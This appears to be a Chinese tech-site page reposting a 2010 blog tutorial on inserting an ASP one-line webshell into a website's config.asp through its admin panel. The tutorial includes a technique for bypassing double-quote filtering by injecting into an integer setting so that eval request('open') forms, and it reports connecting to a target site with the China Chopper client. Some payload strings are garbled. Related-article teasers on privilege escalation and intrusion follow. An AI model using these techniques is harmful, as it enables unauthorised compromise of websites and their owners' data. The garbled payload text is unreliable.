后台插入配置文件的风险 后台怎么插入配置文件?
一般而言,后台插一句话,如果数据库扩展名是asp的话,那么插数据库,但是如果有配置文件可以插的话,那肯定是插入配置文件了,但是插入配置文件有一个很大的风险,那就是一旦出错那么全盘皆输,有可能不仅仅造成后台无法登陆,甚至有可能是整个网站系统崩溃,所以插入配置文件,请慎之又慎。
话归正题,如果想插入配置文件,一般是config.asp,那么首先需要了解这个文件的一般情况。
网站的配置一般是保存网站名,地址,email之类的,既然是字符,那么格式应当是
webname=“test website”
对于这样的配置插入一句话的话,我们的机会就是替换test website,那么需要闭合2个",同时要插入一句话,语句可以这样
"%><%eval><%s= webname="“"%"><%eval><%s= eval="">
所以加入<%s=",这里特别要注意“s=”,如果没有这个等号的话,那么就会成<%" ",这样必将出错。
好了,这是常规的办法,现在我们回到开始那个问题,按照前面的方法插入
插入后,我们再点击“网站设置” ,出现错误
从这个错误,我们可以得到2个信息。
第一,配置文件的路径:http://www.target.com/zfbm/zfb/inc/config.asp
第二,网站名的变量为webname。
昨天由于很晚了,就没继续看,今天出差,晚上回来刚刚上Q,小刀刀就q我,说拿下了,并说这个后台过滤了双引号",结合昨天的错误一看果然是,由于我们闭合前面双引号起"的那个双引号收"被过滤成单引号',所以就成了webname=" ',这样的话那么这个双引号没有闭合,由于双引号是vbscript的控制符,没有闭合config.asp运行必然出错。那么我们遇到这种双引号被过滤了的情况改怎么办呢。
由于插入一句话必须要用双引号括起来,而输入双引号又被过滤,所以我们可以利用他们自身的双引号来解决。
在配置文件中,我们还可以看到这样一些设置
就是配置网站的公告数 ,文章数等。可以假设一下,他必然是整数赋值,没有双引号包括
num=5
num是整数型,不然就成字符了num="5"
那么我们的一句话就可以这样构建,如图
在公告数中我们插入5%><%eval><%
必须要有5,不然将会出错,在网站名中我们插入"open"
由于我们没有输入双引号,不存在过滤,我们利用 配置文件本身的双引号来达到目的。那么配置文件现在的内容如下
<%
....................
webname="open"
num=5%><%eval><%
webnum=7
.......
%>
我们的一句话就相应为
eval request("open"),open为密码。
用菜刀成功连接
从上可见,我们成功利用配置文件本身避开了一句话中双引号被过滤的问题。
那么在网页设计方面,我们可以增加过滤<,%,>或者组合<%,%>这些特殊符号,禁止这些符号的输入,那么将大大增加网页安全。
by daokers2010.4.28深夜于Canton
利用网站记录wrong文件sqlin.asp可以绕过sql防注入
今晚群里朋友叫看个站,有sql防注入,绕不过,但是有发现记录wrong的文件sqlin asp。既然做了记录,再查看了下它的记录文件于是想着构造个asp一句话写进去,前面几种没加密的都失败了,于是写了个加密的┼攠數畣
详情2018-03-01 09:02:45责编:llp 来源:驱动管家什么是dos攻击?dos攻击有哪些方法?
DoS攻击由于攻击简单、容易达到目的、难于防止和追查越来越成为常见的攻击方式。对它的总体了解,成为有效避免,查找原因,制订对策提供有用的帮助。DoS(Denial of Service)拒绝服务攻击广义上可以指任何导致
详情2018-02-01 12:17:26责编:llp 来源:驱动管家预防电脑中毒的方法介绍,让你的电脑不再中毒
电脑一定要安装杀毒软件使用才安全么?下面小编就教你如何让你的电脑不安装任何杀毒软件也可以非常的安全使用。1 少用搜索去搜索软件,因为放木马的人都是去下载网站买一些广告位,然后做些下载按钮,你点击下载
详情2018-01-05 10:32:05责编:llp 来源:驱动管家filezilla server的提权方法 filezilla server怎么防御提权?
目标站点环境:Windows Server 2008 R2 x64PHP Version 5 4 31MySQL Server 5 5开启安全模式禁用一些函数:disable_functions,exec,system,passthru,popen,pclose,shell_exec,proc_open,dl,chmod,escapesh
详情2018-01-25 13:32:55责编:llp 来源:驱动管家黑客入门教程 黑客入门的知识大讲解
第一节、黑客的种类和行为以我的理解,“黑客”大体上应该分为“正”、“邪”两类,正派黑客依靠自己掌握的知识帮助系统管理员找出系统中的漏洞并加以完善,而邪派黑客则是通过各种黑客技能对系统进行攻击、入侵
详情2018-01-16 08:54:11责编:llp 来源:驱动管家利用mysql弱口令拿到系统权限的前提条件是什么?怎么提权?
S-serv提权方式人人都会用了,搞得现在的主机都配置得非常安全,看来攻击手法的层出不穷也是造成中国网络安全进步的一大原因之一,还有其他的pcanywhere获取密码,替换服务,等等。但是现在也没这么好搞了,随着
详情2018-02-12 08:50:46责编:llp 来源:驱动管家internet explorer浏览器存在漏洞会被利用控制系统
Internet Explorer是微软发布的非常流行的WEB浏览器。IE在处理数据流时存在漏洞,远程攻击者可能利用此漏洞控制用户系统。如果用户使用Internet Explorer查看了特制网页,网页就可能返回没有注册处理器的非预期
详情2018-01-20 15:30:52责编:llp 来源:驱动管家如何关闭21端口?关闭23端口的方法
21端口主要用于FTP(FileTransferProtocol,文件传输协议)服务。端口说明:21端口主要用于FTP(FileTransferProtocol,文件传输协议)服务,FTP服务主要是为了在两台计算机之间实现文件的上传与下载,一台计算机
详情2018-02-15 15:32:22责编:llp 来源:驱动管家常规入侵网站 如何在root bat文件中插入木马?
我发现了一个网站,于是常规入侵。很好,它的FINGER开着,于是我编了一个SHELL,aaa帐号试到zzz(这是我发现的一个网上规律,那就是帐号的长度与口令的强度成正比, 如果一个帐号只有两三位长,那它的口令一般也
详情2018-03-02 16:26:32责编:llp 来源:驱动管家从两方面防范ddos攻击:应对ddos攻击和预防ddos攻击为主
DDoS攻击是利用一批受控制的机器向一台机器发起攻击,这样来势迅猛的攻击令人难以防备,因此具有较大的破坏性。如果说以前网络管理员对抗Dos可以采取过滤IP地址方法的话,那么面对当前DDoS众多伪造出来的地址则显
详情2018-02-13 13:21:23责编:llp 来源:驱动管家
- 将主机变成肉鸡?入侵3389终端的详细过程
- UG怎么画圆柱体?ug制作圆形立体柱的教程
- qlv格式转换成mp4格式的具体操作方法介绍
- 购买电脑的时候屏幕尺寸和分辨率应该怎么选择
- i5 7500和i3 8100哪个好 i3-8100对比i5-7500评测
- 微信发布了v2.6.2正式版 主要新增消息撤回后可重新编辑
- 微信:2017年度用户最喜爱的朋友圈广告投票结果
- 《消费者报告》评特斯拉Model3:好操控感 但也有不少缺陷
- 教你在xp系统下快速配置多个网关的方法
- 教你一招怎么直接在u盘上运行qq
- 坚果手机评测 看看这些数据就知道坚果手机值不值得买?
- 锤子m1评测 锤子m1使用分析报告
- 任务栏显示桌面图标不见的解决方法
- 电脑开机不能完成自检的五个常见原因
- 如何在冬虫草服务器上防止用户账户被修改?
- z blog后台权限怎么拿?这里有三种常用简单拿shell的方法
- 用迅捷pdf转换器编辑pdf文件内容的时候怎么编辑
- 电脑支付宝怎么抢咻一咻红包 支付宝电脑版抢红包的教程
- 在给电脑安装声卡驱动的时候进度条卡顿怎么解决
- 电脑的双路cpu是什么意思?双路cpu的介绍